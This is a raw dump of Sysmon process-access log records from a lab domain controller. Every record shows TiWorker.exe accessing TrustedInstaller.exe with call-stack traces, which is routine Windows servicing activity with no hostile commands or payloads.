13:30:30.513{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012774Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.498{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012773Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.482{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012772Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.482{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012771Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.467{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012770Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.467{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012769Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.467{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012768Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.467{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012767Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.451{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012766Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.451{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012765Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.451{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012764Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.435{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012763Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.435{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012762Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.435{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012761Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.435{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012760Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.435{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012759Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.420{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012758Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.420{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012757Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 